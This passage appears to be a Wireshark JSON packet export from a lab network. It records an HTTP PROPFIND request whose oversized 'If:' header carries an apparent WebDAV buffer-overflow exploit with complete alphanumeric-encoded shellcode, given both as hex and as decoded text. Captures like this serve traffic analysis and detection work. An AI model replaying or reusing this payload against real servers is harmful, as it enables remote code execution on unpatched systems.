"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:c8:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868744",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000409000",
|
||
"tcp.analysis.bytes_in_flight": "1625",
|
||
"tcp.analysis.push_bytes_sent": "1625"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000774000",
|
||
"tcp.time_delta": "0.000055000"
|
||
},
|
||
"tcp.payload": "52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "666",
|
||
"tcp.segment": "667",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1625",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:54:41:70:53:42:70:51:44:64:56:71:49:6b:74:67:46:6f:52:6f:6c:63:44:51:58:51:44:69:43:77:4d:43:50:50:56:66:45:75:67:54:50:45:44:59:55:75:59:4a:71:4e:42:44:4d:65:5a:64:73:47:e6:a5:a7:e6:9d:93:e6:b5:8d:e7:a5:ad:e5:89:81:e5:a5:a6:e7:a1:8f:e5:a1:af:e4:b1:b7:e4:89:b4:e6:85:8e:e7:a1:92:e5:89:88:e7:85:ae:e6:a5:b3:e4:99:b7:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:99:87:e4:b5:b6:e4:9d:85:e5:9d:ba:e5:81:83:e4:a5:97:e7:99:b4:e5:89:b9:e7:85:89:e4:b1:b7:e5:9d:96:e7:95:a8:e6:a5:a3:e7:81:9a:e4:b5:88:e4:89:ba:e5:a5:a8:e5:95:8e:e5:a1:84:e5:a5:ad:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:65:6b:5a:45:55:47:54:76:67:69:6a:6d:4d:52:4b:61:62:53:6f:4d:56:45:53:44:6a:50:54:73:67:41:75:56:43:72:4e:5a:48:53:6e:4e:74:46:66:55:4e:53:56:46:45:64:42:57:68:6a:4c:4f:57:e5:89:a2:e7:a1:81:e4:89:a6:e4:91:a2:e7:a9:b7:e6:95:a1:e6:bd:b8:e5:9d:89:e7:95:a7:e5:a9:a6:e7:99:92:e4:85:a3:e6:91:8d:e6:a9:8c:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:99:ae:e4:a1:82:e4:91:85:e5:95:87:e1:8f:80:e6:a0:83:e5:a5:b4:e6:89:85:e5:85:89:e6:a9:82:e6:a9:b1:e7:9d:a2:e4:ad:b6:e6:bd:95:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/TApSBpQDdVqIktgFoRolcDQXQDiCwMCPPVfEugTPEDYUuYJqNBDMeZdsG<73><47><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ekZEUGTvgijmMRKabSoMVESDjPTsgAuVCrNZHSnNtFfUNSVFEdBWhjLOW<4F><57><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "669"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.969088000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.969088000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.032036000",
|
||
"frame.time_relative": "17.220028000",
|
||
"frame.number": "681",
|
||
"frame.len": "241",
|
||
"frame.cap_len": "241",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "227",
|
||
"ip.id": "0x00006cf1",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000c3bc",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "43711",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "43711",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "90",
|
||
"tcp.len": "175",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2572939989",
|
||
"tcp.nxtseq": "1624",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "114226389",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000cdc5",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:da:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:da:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868762",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.015569000",
|
||
"tcp.analysis.bytes_in_flight": "1623",
|
||
"tcp.analysis.push_bytes_sent": "1623"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.015597000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "680",
|
||
"tcp.segment": "681",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1623",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:7a:42:76:42:62:54:76:44:45:61:54:67:51:66:6f:51:64:6e:53:54:65:48:42:77:61:51:51:54:65:6c:49:4c:4e:56:43:4c:6e:6a:72:47:7a:6b:42:68:4b:69:76:4a:78:6a:7a:72:79:6c:42:4d:e5:81:aa:e6:85:a6:e4:99:a4:e7:a9:98:e4:95:97:e7:99:ad:e7:85:8d:e7:a9:b3:e7:85:b8:e5:8d:96:e6:91:89:e4:9d:87:e7:89:b9:e5:9d:b1:e5:a9:a1:e6:99:b4:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:91:ad:e7:91:b4:e5:81:95:e6:85:96:e4:95:ba:e6:b5:94:e7:a5:b7:e7:89:81:e6:b9:90:e7:95:89:e5:91:93:e6:85:88:e4:9d:aa:e4:bd:a2:e5:a1:a9:e6:99:91:e5:81:ad:e7:85:ac:e5:95:a3:e6:b9:93:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:51:62:45:47:71:66:65:46:6c:65:4e:66:78:49:79:7a:79:4f:6a:70:59:52:75:78:7a:65:68:53:6c:69:73:54:53:77:48:79:6b:72:63:54:77:4e:73:64:43:7a:72:4c:61:72:77:77:63:4e:71:65:e4:91:8b:e7:85:b6:e5:a5:8b:e7:89:ae:e6:85:a1:e5:91:89:e6:b1:b1:e6:99:91:e4:a5:b0:e6:99:aa:e7:a1:b3:e6:91:a1:e6:a9:a3:e6:91:a3:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:85:81:e4:bd:9a:e4:9d:8d:e5:81:8d:e1:8f:80:e6:a0:83:e4:8d:a3:e7:89:a9:e5:a1:b5:e4:99:a7:e7:9d:b6:e7:a9:99:e5:9d:86:e4:a5:94:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:9